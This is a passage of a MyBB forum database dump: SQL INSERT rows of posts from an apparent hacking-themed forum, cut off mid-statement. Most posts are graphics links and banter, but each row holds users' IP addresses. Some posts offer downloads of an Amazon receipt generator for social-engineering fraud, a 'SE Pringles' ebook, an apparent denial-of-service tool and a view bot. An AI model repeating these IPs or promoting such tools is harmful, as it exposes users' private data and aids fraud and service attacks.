[URL=http://mono72.deviantart.com/art/Monochrome-Render-Pack-No-2-68521510\"]Monochrome C4Ds[/URL] [B]Some Good C4D Deviants[/B] -[URL=http://mrrobin.deviantart.com/\"]MrRobin[/URL] -[URL=http://redfoxgfx.deviantart.com/\"]RedFoxGFX[/URL] -[URL=http://jdluxe.deviantart.com/\"]Jdluxe[/URL] [B]Renders/Stocks[/B] - [URL=http://www.renders-graphiques.fr\"]Renders-Graphiques[/URL] - [URL=http://www.planetrenders.net\"]Planetrenders[/URL] - [URL=http://www.delta-visions.net/forums/index\"]Delta-Visions[/URL] - [URL=http://www.photobucket.com/\"]Photobucket[/URL] - [URL=http://randomc.net/\"]Randomc[/URL] [B]Renders/Stocks Packs[/B] -[URL=http://alpine.brainkiller.be/Resources/stocks_collectedby_delta-visions.com.rar\"]700 Stocks pack[/URL] -[URL=http://alpine.brainkiller.be/Renders/Marvel_render_pack_by_delta-visions.rar\"]Marvel Renders Pack[/URL] -[URL=http://alpine.brainkiller.be/Resources/Renders_P1_collectedby_delta-visions.com.rar\"]Massive render packs part 1[/URL] -[URL=http://alpine.brainkiller.be/Resources/renders_P2_collectedby_delta-visions.com.rar\"] Massive render packs part 2[/URL] -[URL=http://alpine.brainkiller.be/Resources/renders_P3_collectedby_delta-visions.com.rar\"] Massive render packs part 3[/URL] -[URL=http://www.mediafire.com/download.php?qnzrymnmthz\"]Ownozz! Human stock[/URL] -[URL=http://www.mediafire.com/?mymdiiye5xm\"]Revolution recourse render pack[/URL] [B]Brushes[/B] -[URL=http://alpine.brainkiller.be/Resources/Brushes_collectedby_delta-visions.com.rar\"]150 brushes pack[/URL] -[URL=http://www.deviantart.com/download/29371497/manga_blood.zip\"]Blood Brush[/URL] -[URL=http://www.deviantart.com/download/44218044/1deadpixel___vector_brush_pack_by_1deadpixel.abr\"]Vector Brush[/URL] -[URL=http://www.deviantart.com/download/56382366/Brush_Stroke_Brushes_by_genesbuffet.abr\"]Stroke bursh[/URL] -[URL=http://www.deviantart.com/download/65889307/Vector_Grunge_Brush_Pack_by_kShinn.jpg\"]Vector Grunge Brush[/URL] -[URL=http://www.deviantart.com/download/61824967/MF_Splatter_Brush_Pack_v_01_by_Osiris2735.abr\"]Splatter Brush[/URL] -[URL=http://www.deviantart.com/download/83975723/Cloud_Smudge_Brushes_by_Noise_Less.abr\"]Cloud Smudge Brush[/URL] -[URL=http://www.deviantart.com/download/71513208/Chilled_smudge_brushes_2_by_served_chilled.abr\"]Chilled smudge set[/URL]', '24.212.197.164', '416597412', '1', '0', '82', '1346093939', '1', '7a013d47b8918911bcf15f4c84c2663d', '0', '1346093939'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1148', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1346094126', 'Banned for not making sense. Also, I was not talking to you. I was talking to t3h jok3r.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd6c8f854ec00e16eadba7708ee999504', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1149', '238', '1148', '56', 'RE: Ban the user above you', '0', '2', 'Apathy', '1346095802', '[quote=\'iTzIpod\' pid=\'1148\' dateline=\'1346094126\'] Banned for not making sense. Also, I was not talking to you. I was talking to t3h jok3r. [/quote] Banned for me not noticin that. So fuck you :)', '173.206.128.176', '-1378975568', '0', '0', '0', '0', '1', 'edc10b453656efc81cdc2f6da09fa58d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1150', '260', '0', '34', 'Afterburn Photoshop Tutorial', '0', '82', 'iTzIpod', '1346095927', '[img]http://img834.imageshack.us/img834/337/tutkl.png[/img] Credits: Toxin Enjoy! Good luck on the signature. Post results below!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a12dfda0ee58edfe108d4b762d7afdd7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1151', '260', '1150', '34', 'RE: Afterburn Photoshop Tutorial', '0', '2', 'Apathy', '1346096026', 'Image is broken.', '173.206.128.176', '-1378975568', '0', '0', '0', '0', '1', '4ed8057f575f312585a6899d5348cc13', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1152', '261', '0', '34', 'Metroid Signature Tutorial', '0', '82', 'iTzIpod', '1346096034', '[img]http://fc00.deviantart.net/fs71/f/2011/292/1/e/tutorial_by_nytelock-d4dapvu.png[/img] Credits: Toxin Post results below. Enjoy Good luck!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5ae92908f5dfbb232f208f3db1b7ed5b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1153', '260', '1151', '34', 'RE: Afterburn Photoshop Tutorial', '0', '82', 'iTzIpod', '1346096112', '[quote=\'Apathy\' pid=\'1151\' dateline=\'1346096026\'] Image is broken. [/quote] No it\'s not? If it is, just Right click > Open Image In New Tab', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '305bbca64c8730c9f2c1fdc84e988eaf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1154', '259', '1147', '34', 'RE: Instant\'s GFX Guide', '0', '2', 'Apathy', '1346096172', 'Not bad thanks. Did you put this together?', '173.206.128.176', '-1378975568', '0', '0', '0', '0', '1', 'f6405f5803c3c0676338c3242f311325', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1155', '259', '1154', '34', 'RE: Instant\'s GFX Guide', '0', '82', 'iTzIpod', '1346096393', '[quote=\'Apathy\' pid=\'1154\' dateline=\'1346096172\'] Not bad thanks. Did you put this together? [/quote] Yeah. But I messed up on the links.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '800b18da5a09cc6fc26a5efa1b917ac2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1162', '253', '1106', '56', 'RE: Count to 200', '0', '1', 't3h jok3r', '1346101323', '12. Because I like the CSS buttons.', '41.174.55.45', '699283245', '1', '0', '0', '0', '1', '40e7b65720797213bf2f7dbedd17f268', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1163', '258', '1142', '58', 'RE: Recurring Team now...', '0', '1', 't3h jok3r', '1346101615', 'I\'m kinda good at ripping MyBB themes.', '41.174.55.45', '699283245', '1', '0', '0', '0', '1', '72121b7f4b67443dc57bd049b15ea71c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1164', '197', '696', '56', 'RE: /me Thread', '0', '1', 't3h jok3r', '1346101664', '/me is sad cuz he has too much work to do today.', '41.174.55.45', '699283245', '1', '0', '0', '0', '1', '60e04198ff2aaeecb9c56df4b878affe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1157', '238', '1149', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1346096690', '[quote=\'Apathy\' pid=\'1149\' dateline=\'1346095802\'] [quote=\'iTzIpod\' pid=\'1148\' dateline=\'1346094126\'] Banned for not making sense. Also, I was not talking to you. I was talking to t3h jok3r. [/quote] Banned for me not noticin that. So fuck you :) [/quote] Dude what\'s with the words? -.- Banned for swearing and spamming thread + breaking rules. (Only post in threads 3 times a day)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f75edf09f66e95b36a9cd5f141ab8d61', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1158', '253', '1106', '56', 'RE: Count to 200', '0', '62', 'R?????zo?', '1346098853', '10. what happens once we reach 200?', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '8fdc035228536d2f0c6a4758f2e8e3c7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1159', '256', '1139', '3', 'RE: [Bug] View New Posts', '0', '1', 't3h jok3r', '1346100038', 'Not a bug. That happens when there was no post under a couple of hours. Click on \"View today\'s posts\" to view all the threads that were created or had a new reply under 24 hours.', '41.174.55.45', '699283245', '1', '0', '0', '0', '1', '946f72826bd068dd7664cbf6ab04d42f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1160', '240', '1025', '3', 'RE: [Bug] Complaints & Rep Abuse Support', '0', '1', 't3h jok3r', '1346100208', 'Now that\'s a bug. It\'s not suppose to be moderated by Moderators, only by admins.', '41.174.55.45', '699283245', '1', '0', '0', '0', '1', '61bc6a72e10e3f22d24bc5995d234cd9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1161', '253', '1106', '56', 'RE: Count to 200', '0', '2', 'Apathy', '1346100510', '11 because why not.', '173.206.128.176', '-1378975568', '0', '0', '0', '0', '1', '8992b142e8fac7a389779c0a5b70f735', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1165', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1346102149', 'The next number is 13. @Reloadzor, nothing happens. The thread is closed. And it dies.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '05267bb126ca9681332b266b105d3b58', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1166', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1346102200', '/me feels t3h jok3r\'s feelings :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '200ab107ee621b13b7f9b1516e88410b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1167', '197', '696', '56', 'RE: /me Thread', '0', '2', 'Apathy', '1346102417', '/me is mad.', '173.206.128.176', '-1378975568', '0', '0', '0', '0', '1', 'bacbe62b05a76af686289f425c02d2fe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1168', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1346102656', '/me is pissed off.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '110551a08f5aa6921d406c8f9b1c47e6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1169', '197', '696', '56', 'RE: /me Thread', '0', '2', 'Apathy', '1346102711', '/me is more pissed off.', '173.206.128.176', '-1378975568', '0', '0', '0', '0', '1', '22e5c0378e5f04ad84967b5f39031279', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1170', '191', '666', '15', 'RE: ProDos v1.0', '0', '1', 't3h jok3r', '1346103907', 'Just type in the url and the port is 80.', '41.174.54.39', '699282983', '1', '0', '0', '0', '1', 'd80ee2eeff370f46be1d9a9596b59cdb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1171', '262', '0', '43', 'Amazon Receipt Generator V.2', '0', '1', 't3h jok3r', '1346104450', '[align=center]This tool will come in handy to you while SE\'ing Amazon for different products. [img]http://i.imgur.com/OyBOU.png[/img] [url=http://www.mediafire.com/?53618epamu1n0co][img]http://i.imgur.com/Dni8C.png[/img][/url] [/align]', '41.174.54.39', '699282983', '1', '0', '0', '0', '1', 'd115539b7e293bef079e59029bc45479', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1172', '263', '0', '30', 'Emillionforums premium content: Extreme wiki poster', '0', '2', 'Apathy', '1346105023', 'Sales Thread [quote]http://www.warriorforum.com/warrior-special-offers-forum/526938-extreme-wiki-poster-ultimate-wiki-posting-tool-addons.html[/quote] Download [quote]http://4fastfile.com/abv-fs/2447-1289426460/ewp1.3.2.rar[/quote] A THANK YOU A DAY KEEPS THE DOCTERS AWAY. :)', '173.206.128.176', '-1378975568', '0', '0', '1', '1346117331', '1', '2657a09d5360371fc8ca2461a7eab59b', '0', '1346117331'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1173', '264', '0', '2', 'Something', '0', '1', 't3h jok3r', '1346105024', 'PLEASE DO NOT POST ON THIS THREAD.', '41.174.54.39', '699282983', '1', '0', '0', '0', '1', '77c9c8375bd4a7a750f37a659e9d2171', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1174', '264', '1173', '2', 'RE: Something', '0', '4', 'Triple H', '1346105078', 'Test, DO NOT report or delete. Thanks.', '41.174.54.39', '699282983', '1', '0', '0', '0', '1', '764016073f3cc4f1106c27f4e09ef04c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1175', '264', '1173', '2', 'RE: Something', '0', '5', 'Timmy', '1346105138', 'Test #2, DO NOT report or delete. Thanks.', '41.174.54.39', '699282983', '1', '0', '0', '0', '1', '3c7c4bf5dc0b9c341617f97f26d8a63b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1176', '264', '1173', '2', 'RE: Something', '0', '20', 'JakeUS', '1346105203', 'Test by LH Staff, sorry for logging into your account.', '41.174.54.39', '699282983', '1', '0', '0', '0', '1', 'a4251462f4628b0f38b658e78557def9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1177', '264', '1173', '2', 'RE: Something', '0', '82', 'iTzIpod', '1346105292', 'Another test, sorry for logging into your account bro.', '41.174.54.39', '699282983', '1', '0', '0', '0', '1', '4bbed1d2b59dd2119814df1588b2c2c2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1178', '113', '286', '15', 'RE: ?Auto Youtube viewer?', '0', '1', 't3h jok3r', '1346106053', 'Anti Virus? I thought this was a YT bot.', '41.174.54.39', '699282983', '1', '0', '0', '0', '1', '878b0897391440ea52306ee206c500c4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1180', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1346108923', '/me is pissed really pissed off...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '69feaa6c1129c1d3e8680b810cd51ee2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1181', '249', '1097', '56', 'RE: Last person to reply, wins!', '0', '82', 'iTzIpod', '1346109013', '[quote=\'Baws\' pid=\'1097\' dateline=\'1346034954\'] no @ an admin close thread, now. [/quote] Why do you want someone to close the thread? It is only up to 200.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1db5e2b6cc86fb18f3825168ff2762b5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1182', '247', '1055', '16', 'RE: [Free] [EBook] How to SE Pringles', '0', '82', 'iTzIpod', '1346109303', 'For me, I live in Canada so the tab is called Ask Us. And it works from there. But I think Kelloggs now owns Pringles. I didn\'t write this eBook sorry :/ I tried it 3 times and got it to work successfully. Sorry guys.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '12fbfd196f49db233e480622f28661e5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1183', '191', '1170', '15', 'RE: ProDos v1.0', '0', '82', 'iTzIpod', '1346109408', '[quote=\'t3h jok3r\' pid=\'1170\' dateline=\'1346103907\'] Just type in the url and the port is 80. [/quote] Oh alright. I will give it a try and will post my results.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4b5af43cb3b9609661434b62bf3cd91d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1184', '265', '0', '3', 'Apathy Demoted', '0', '1', 't3h jok3r', '1346109820', 'Nevermind. [color=transparent]I had enough of Apathys BS. I\'m done with Apathy, I will be hiring another Admin soon. Apathy was demoted for reason \"Abuse of Powers\" Message to Apathy: I don\'t care now, I thought we were a team and cool friends but I can\'t tolerate your shit anymore. First you said your cool with (Won\'t release name) then you go on fucking around with him. Secondly, I asked you to promote via usertitle many times, but you viewed the request but didn\'t do shit. Sorry but now I don\'t think you can help me out further. When it also comes to the money you borrowed me for the very first months hosting, I paid you back few weeks ago. And last, I\'m the only admin that has access to a special feature called \"PM LOG\", I can fuckin read, delete, forward any PM via ACP so don\'t you dare thing of lying to me about (won\'t release name). [/color]', '41.174.59.145', '699284369', '1', '0', '2', '1346641970', '1', '17c0689fc6c0948b49aa437e5c152928', '0', '1346641970'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1185', '265', '1184', '3', 'RE: Apathy Demoted', '0', '82', 'iTzIpod', '1346110374', 'Is that me? Thank God he is demoted. I love you t3h jok3r. I hated him so bad.. He made a lot of LQ posts. Such as \" lol yay\" in the 1000 Posts thread and also a bunch of others. I can\'t really think right now.. Anyways. Good luck with this new admin thing. Hopefully it works out fine. [hr] @Sin Cara I suggest you not ask for a position. I do remember t3h jok3r say somewhere on this forum that asking for a position will decrease your chances. And he will promote a member he thinks suits the requirements. Also, WWE (RAW) is on right now. I suggest you watch it Sin Cara. ;) Like I said before, t3h jok3r, good luck with this forum and new admin. Hopefully it works out fine ^_^ EDIT: Wow Sin Cara you made me look stupid now. Since you deleted your post :/', '24.212.197.164', '416597412', '1', '0', '82', '1346163370', '1', '87b34475690e3849fa6d93af6fa4da33', '0', '1346163370'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1186', '266', '0', '47', 'Win a Free Netflix Account~', '0', '82', 'iTzIpod', '1346111714', 'Hey LH, If you don\'t have any money, you can test your luck and win one of my free Netflix Accounts! :D Just simply post here with a number from 1-5 and I will use random.org to choose a number. I will decide a winner once all the numbers are filled Good Luck everyone! Remember to post a number from 1-5. If you make multiple accounts, you will get banned or warned for Multi Accounting (Rule #7) Anyways, Good Luck to all! Requirements: 5+ Posts and at least 1 day registered 1. 2. sirchamp 3. 4. GRONgamer61 5.', '24.212.197.164', '416597412', '1', '0', '82', '1348932251', '1', '1412ab1b8384de1fb9156553d5e49c04', '0', '1348932251'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2808', '266', '1186', '47', 'RE: Win a Free Netflix Account~', '0', '82', 'iTzIpod', '1348932281', 'Updated thread. It will only be 1-5 not 1-10.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a409a7a5fe1f783623b964eafe16d533', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1187', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1346113631', 'Hey t3h jok3r, I would like to request a Usergroup, Application: Name of group: Unique Group Description: We are Unique. We are a HQ Group. And we have the best HQ members. Group Userbar: [img]http://i.imgur.com/cFeJk.png[/img] Forum Name: Unique Headquarters Forum Icon(34x34): [img]http://i.imgur.com/CxrW3.png[/img] Why LH should make this group official: LH should make this group official because this group will be an active group with HQ posts. Only LH\'s finest members can join. It is also an invite only group. And we will do giveaways and contests for the community.We will also contribute to the forum and its activity.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd29a2991688e3cbc189c4318087d9f9d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1188', '267', '0', '3', '[Small Announcement] Userbars/Images Updated', '0', '82', 'iTzIpod', '1346113934', 'Hey LH, I would like to thank t3h jok3r for remaking the Userbars. They look great! And also, I would like to announce that L33t Hacking has updated the Userbars and other images. :D Thanks t3h jok3r for all your hard work and dedication. Feel free to edit this thread t3h jok3r. [color=#32CD32][b]Edited[/b] by Jok3r[/color] [b]Admin[/b] Username Color: Red Star Color: Red [b]Staff[/b] Username Color: Green Star Color: Purple [b]Mod[/b] Username Color: Blue Star Color: Blue [b]Elite[/b] Username Color: Orange Star Color: Orange [b]Normal Members[/b] Username Color: Grey Star Color: Yellow [b]Custom Groups[/b] Username Color: Grey Star Color: Silver [b]Banned[/b] Username Color: Black with strike', '24.212.197.164', '416597412', '1', '0', '1', '1346115066', '1', 'ac08463d71da7b70f31c8c7e5f2eef79', '0', '1346115066'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1189', '268', '0', '49', '[Suggestion] Forum News Section', '0', '82', 'iTzIpod', '1346114870', 'In this section, only members part of the News Team can make threads. And these threads inform members of what happened today/week. And they must make a new thread every week. News Team members must be active and have good grammar.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '06051c7f3ab1a0e155af8729f00097fc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1190', '267', '1188', '3', 'RE: [Small Announcement] Userbars/Images Updated', '0', '1', 't3h jok3r', '1346115120', 'Thanks for the announcement also the permission to edit the thread. So far, I\'m done with the changes. I\'m just trying to make a attractive Admin Userbar.', '41.174.59.145', '699284369', '1', '0', '0', '0', '1', 'f0843cf43921b44fe1a9ef18fdb32e4d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1191', 